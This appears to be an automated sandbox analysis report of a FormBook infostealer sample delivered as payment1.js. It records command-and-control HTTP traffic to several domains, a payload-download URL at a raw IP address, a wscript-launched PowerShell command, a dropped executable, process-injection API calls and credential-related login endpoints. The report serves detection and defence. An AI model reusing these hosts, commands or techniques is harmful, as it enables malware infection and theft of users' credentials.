                Source: global trafficHTTP traffic detected: GET /ajxq/?JZfd=Z0yNDnK53JgtMSLt/Q+dSz0HWqwkNuop0AL5Lrb95TYezZcCk+GBjjC2rO5AP3na8OTPjj2cyURwNj0Uenp5Hjv5SXrtYK2BmGwEpYXvWphiXX161SqTvYw=&28t=_DlH9FNpJbu HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.physicsbrain.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                Source: global trafficHTTP traffic detected: GET /rvdc/?JZfd=4SS44dSHix1qeqRpZ30sUGwaRLQ6PL636AaAeL4eRpehwv4hyktLqvMv9AyoVvbLe7Ilavn5wnoOWJ/fZmmrIfslJ8D6BKaSqIEkHtgn+Cj3tNriNM+Lp4c=&28t=_DlH9FNpJbu HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.infiniteve.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                Source: global trafficHTTP traffic detected: GET /mvfs/?28t=_DlH9FNpJbu&JZfd=OX+XGG1vMjnBpir6rX0/G3mm6BKDnX5s9v0C7sC38KVwA5xuSoQxQAVtGC05vfCZlgARXwgyCJM/mKbUQVyNeO12dcoATF+wDwavyiCFDGb9TNEZS4YCLPo= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.weilaishijie.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                Source: global trafficHTTP traffic detected: GET /xqy6/?JZfd=3AdOd/JiBJZfW59JF3bk/JUX+I6ir2eDUVeNMTHa5bokm3l1PR6gBk+gEKdbuXFpEa+iNwYC+tVHkUu9Fw3QKE4rVdEfXJGpPPZQf/r11XdvYWfnyknaUqI=&28t=_DlH9FNpJbu HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usHost: www.dqvcbn.infoConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)
                Source: global trafficDNS traffic detected: DNS query: www.lucynoel6465.shop
                Source: global trafficDNS traffic detected: DNS query: www.travel-cure.sbs
                Source: global trafficDNS traffic detected: DNS query: www.physicsbrain.xyz
                Source: global trafficDNS traffic detected: DNS query: www.infiniteve.xyz
                Source: global trafficDNS traffic detected: DNS query: www.weilaishijie.xyz
                Source: global trafficDNS traffic detected: DNS query: www.dqvcbn.info
                Source: unknownHTTP traffic detected: POST /0c5p/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-usHost: www.travel-cure.sbsOrigin: http://www.travel-cure.sbsReferer: http://www.travel-cure.sbs/0c5p/Content-Type: application/x-www-form-urlencodedContent-Length: 201Connection: closeCache-Control: max-age=0User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; GTB7.5; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30618; .NET4.0C; BRI/1)Data Raw: 4a 5a 66 64 3d 55 6d 38 7a 57 4d 39 35 69 53 30 62 71 49 62 71 47 43 57 42 45 36 58 47 70 77 57 55 78 59 33 35 52 47 59 79 59 6a 74 72 66 31 4f 7a 6e 49 49 6c 49 30 4e 66 61 76 41 53 51 48 4c 76 30 70 49 4c 53 32 72 73 70 36 39 63 37 62 45 4e 6f 51 69 43 64 54 6b 30 61 2b 55 4b 67 52 73 50 57 42 4d 46 4b 48 6f 50 37 2f 5a 43 74 48 76 64 2b 39 43 6e 68 51 6c 63 44 2f 72 45 67 77 67 39 62 50 73 31 52 62 56 6b 50 75 68 62 53 45 4e 47 37 35 38 57 5a 39 75 37 4c 6a 42 43 47 36 75 63 42 34 4f 55 66 39 7a 53 48 44 38 79 6a 79 6c 4b 62 62 67 31 5a 4e 35 5a 39 33 64 73 74 71 45 71 6f 66 43 6a 46 51 3d 3d Data Ascii: JZfd=Um8zWM95iS0bqIbqGCWBE6XGpwWUxY35RGYyYjtrf1OznIIlI0NfavASQHLv0pILS2rsp69c7bENoQiCdTk0a+UKgRsPWBMFKHoP7/ZCtHvd+9CnhQlcD/rEgwg9bPs1RbVkPuhbSENG758WZ9u7LjBCG6ucB4OUf9zSHD8yjylKbbg1ZN5Z93dstqEqofCjFQ==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 07:15:08 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closecf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Avh9oG%2FGUuJNIk6FyMX5v4igg5uPyGtSmqokcByDkVEsaFhOp2B4HitzxqRiwXYsWV9akBw4X0sO0%2FoVGAi1O1OClzVow30sBGvHn%2F8NKtnvFqPqgGsAgnCSR5VRlCuTowlApyoWQ8E%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 913c39665fed72a1-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1902&min_rtt=1902&rtt_var=951&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=572&delivery_rate=0&cwnd=197&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 07:15:50 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 07:15:52 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 07:15:55 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Feb 2025 07:15:57 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: wscript.exe, 00000000.00000003.1697035431.00000174E98B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://196.251.92.64/crypt/popo.ps1
                Source: wscript.exe, 00000000.00000002.1935377292.00000174E9C4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://196.251.92.64/crypt/popo.ps1m?
                Source: powershell.exe, 00000001.00000002.1852164332.0000026D0C65C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000001.00000002.1852164332.0000026D0C4E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000001.00000002.1852164332.0000026D0AEF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000001.00000002.1852164332.0000026D0C0FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                Source: powershell.exe, 00000001.00000002.1852164332.0000026D0C4E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2992102247.00000000051A8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dqvcbn.info
                Source: sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2992102247.00000000051A8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.dqvcbn.info/xqy6/
                Source: MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: powershell.exe, 00000001.00000002.1852164332.0000026D0AEF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: powershell.exe, 00000001.00000002.1852164332.0000026D0C4E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: wscript.exe, 00000000.00000002.1935377292.00000174E9C4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                Source: MRINFO.EXE, 0000000A.00000002.2988076296.00000000032FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: MRINFO.EXE, 0000000A.00000002.2988076296.00000000032FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: MRINFO.EXE, 0000000A.00000002.2988076296.00000000032FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: MRINFO.EXE, 0000000A.00000002.2988076296.00000000032FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: MRINFO.EXE, 0000000A.00000002.2988076296.00000000032FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: MRINFO.EXE, 0000000A.00000002.2988076296.00000000032FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: MRINFO.EXE, 0000000A.00000003.2302750338.00000000082A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: powershell.exe, 00000001.00000002.1852164332.0000026D0C65C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1889475018.0000026D1AF6D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000001.00000002.1852164332.0000026D0C0FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                Source: powershell.exe, 00000001.00000002.1852164332.0000026D0C0FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                Source: MRINFO.EXE, 0000000A.00000002.2993155660.00000000082C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: MRINFO.EXE, 0000000A.00000002.2990861843.00000000042F6000.00000004.10000000.00040000.00000000.sdmp, MRINFO.EXE, 0000000A.00000002.2992872250.00000000067C0000.00000004.00000800.00020000.00000000.sdmp, sxkv2RIDKUVCF4X010eCnC.exe, 0000000B.00000002.2990429324.0000000003296000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2989939402.0000000003060000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2992102247.0000000005150000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2104088509.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2989897397.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2106523345.0000000002A10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2989992903.0000000003550000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000A.00000002.2987628096.0000000003050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2110867358.0000000003840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: Process Memory Space: powershell.exe PID: 5352, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                Powershell drops PE file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to dropped file
                Sample has a suspicious name (potential lure to open the executable)
                Source: payment1.jsStatic file information: Suspicious name
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                Wscript starts Powershell (via cmd or directly)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy RemoteSigned -File "C:\Temp\dddddd.ps1"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0042CD13 NtClose,5_2_0042CD13
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B635C0 NtCreateMutant,LdrInitializeThunk,5_2_02B635C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62B60 NtClose,LdrInitializeThunk,5_2_02B62B60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_02B62C70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_02B62DF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B64340 NtSetContextThread,5_2_02B64340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B63090 NtSetValueKey,5_2_02B63090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B63010 NtOpenDirectoryObject,5_2_02B63010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B64650 NtSuspendThread,5_2_02B64650
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62AB0 NtWaitForSingleObject,5_2_02B62AB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62AF0 NtWriteFile,5_2_02B62AF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62AD0 NtReadFile,5_2_02B62AD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62BA0 NtEnumerateValueKey,5_2_02B62BA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62B80 NtQueryInformationFile,5_2_02B62B80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62BF0 NtAllocateVirtualMemory,5_2_02B62BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62BE0 NtQueryValueKey,5_2_02B62BE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B639B0 NtGetContextThread,5_2_02B639B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62EA0 NtAdjustPrivilegesToken,5_2_02B62EA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62E80 NtReadVirtualMemory,5_2_02B62E80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62EE0 NtQueueApcThread,5_2_02B62EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62E30 NtWriteVirtualMemory,5_2_02B62E30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62FB0 NtResumeThread,5_2_02B62FB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62FA0 NtQuerySection,5_2_02B62FA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62F90 NtProtectVirtualMemory,5_2_02B62F90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62FE0 NtCreateFile,5_2_02B62FE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62F30 NtCreateSection,5_2_02B62F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62F60 NtCreateProcessEx,5_2_02B62F60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62CA0 NtQueryInformationToken,5_2_02B62CA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_02B62CF0 NtOpenProcess,5_2_02B62CF0
